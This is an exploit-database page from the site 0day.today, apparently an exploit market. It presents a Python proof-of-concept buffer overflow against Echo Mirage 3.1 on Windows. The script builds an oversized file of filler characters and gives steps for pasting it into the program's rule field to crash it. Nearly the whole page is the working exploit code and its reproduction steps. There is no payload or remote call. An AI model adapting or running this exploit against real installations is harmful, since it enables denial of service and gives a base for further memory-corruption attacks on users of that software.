[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Echo Mirage 3.1 - Buffer Overflow Exploit

Author
InitD Community
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-32021
Category
dos / poc
Date add
21-01-2019
Platform
windows
#!/usr/bin/python

# Exploit Title: Echo Mirage 3.1 Buffer Overflow PoC (Stack Overflow)
# Software Link: https://sourceforge.net/projects/echomirage.oldbutgold.p/
# Version: 3.1 (x64)
# Exploit Author: InitD Community
# Contact: https://twitter.com/initd_sh
# Website: http://initd.sh/
# Tested on: Windows 7


"""
Step to Reproduce : Open Echo Mirage --> 1) Click on "Rules" --> 2) click on "New" --> 3)Copy "Echo-Mirage-BoF-POC.txt" content and Paste  in "action" field. --> BOoo0m.

Thanks: Touhid M.Shaikh(@touhidshaikh22), Shrutirupa(@creak_crypt)
This Bug Identified by Touhid M.Shaikh
"""

buffer = "A"*24241

RBP = "B"*8

PAD = "C"*50

evil = buffer + RBP + PAD


evil_file = open("Echo-Mirage-BoF-POC.txt","w")

evil_file.write(evil)

evil_file.close()

#  0day.today [2024-09-28]  #